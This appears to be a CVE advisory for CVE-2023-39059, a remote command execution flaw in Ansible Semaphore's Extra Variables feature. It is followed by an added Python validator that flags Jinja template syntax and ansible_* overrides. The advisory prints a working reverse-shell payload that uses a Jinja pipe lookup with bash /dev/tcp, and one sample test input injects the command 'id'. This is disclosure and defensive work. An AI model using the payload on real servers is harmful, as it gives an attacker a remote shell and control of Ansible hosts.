Last active August 24, 2023 06:18
CVE-2023-39059
---------------------------------------------------------------
[VulnerabilityType Other]
Remote Command Execution (RCE)
---------------------------------------------------------------
[Affected Component]
Ansible Semaphore includes a feature called "Extra Variables." This feature can be accessed at https://<semaphore-endpoint>/project/id/environment and is directly associated with the ansible-playbook --extra-vars flag.
---------------------------------------------------------------
[Attack Type]
Remote
---------------------------------------------------------------
[Impact Code execution]
true
---------------------------------------------------------------
[Impact Denial of Service]
true
---------------------------------------------------------------
[Impact Escalation of Privileges]
true
---------------------------------------------------------------
[Impact Information Disclosure]
true
---------------------------------------------------------------
[Attack Vectors]
The --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE) and read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the ansible server. Payload:
{"ansible_user": "{{ lookup('ansible.builtin.pipe', \"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1'\") }}"}
---------------------------------------------------------------
[Has vendor confirmed]
true
---------------------------------------------------------------
[Discoverer]
@alevsk
---------------------------------------------------------------
[Reference]
https://www.alevsk.com/2023/07/a-quick-story-of-security-pitfalls-with-execcommand-in-software-integrations/
---------------------------------------------------------------
[Vendor of Product]
ansible semaphore
---------------------------------------------------------------
[Affected Product Code Base]
ansible semaphore v2.8.90
---------------------------------------------------------------
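
A pre-flight check for Extra Variables input that flags the pattern in the [Attack Vectors] payload (Jinja2 template syntax inside a value, and an override of an `ansible_*` variable) before the JSON reaches `ansible-playbook --extra-vars`. This is an added example, not code from Ansible Semaphore or from the advisory; the function names, the policy of reserving the `ansible_` prefix, and the sample inputs are assumptions.

```python
import json
import re

# Jinja2 delimiters that make Ansible treat a string as a template.
JINJA_MARKERS = re.compile(r"\{\{|\{%|\{#")
# Assumption of this example: untrusted users may not override Ansible's
# own connection/behaviour variables (ansible_user, ansible_connection, ...).
RESERVED_PREFIX = "ansible_"


def find_violations(node, path="$"):
    """Recursively walk parsed JSON and return a list of (path, reason)."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if JINJA_MARKERS.search(key):
                found.append((child, "template syntax in key"))
            if path == "$" and key.lower().startswith(RESERVED_PREFIX):
                found.append((child, "reserved ansible_* variable"))
            found.extend(find_violations(value, child))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            found.extend(find_violations(item, f"{path}[{i}]"))
    elif isinstance(node, str) and JINJA_MARKERS.search(node):
        found.append((path, "template syntax in value"))
    return found


def check_extra_vars(raw):
    """Return violations for a raw Extra Variables JSON document."""
    try:
        doc = json.loads(raw)
    except json.JSONDecodeError as exc:
        return [("$", f"not valid JSON: {exc.msg}")]
    if not isinstance(doc, dict):
        return [("$", "top level must be a JSON object")]
    return find_violations(doc)


# Constructed sample inputs (not taken from a real deployment).
BENIGN = '{"app_version": "1.4.2", "hosts": ["web1", "web2"]}'
TEMPLATED = '{"ansible_user": "{{ lookup(\'ansible.builtin.pipe\', \'id\') }}"}'
NESTED = '{"cfg": {"motd": ["ok", "{% if 1 %}x{% endif %}"]}}'

if __name__ == "__main__":
    for sample in (BENIGN, TEMPLATED, NESTED):
        print(sample, "->", check_extra_vars(sample) or "accepted")
```

An input filter of this kind is a compensating control in front of the affected feature; it assumes extra variables are submitted as a JSON object, as in the payload shown in the advisory.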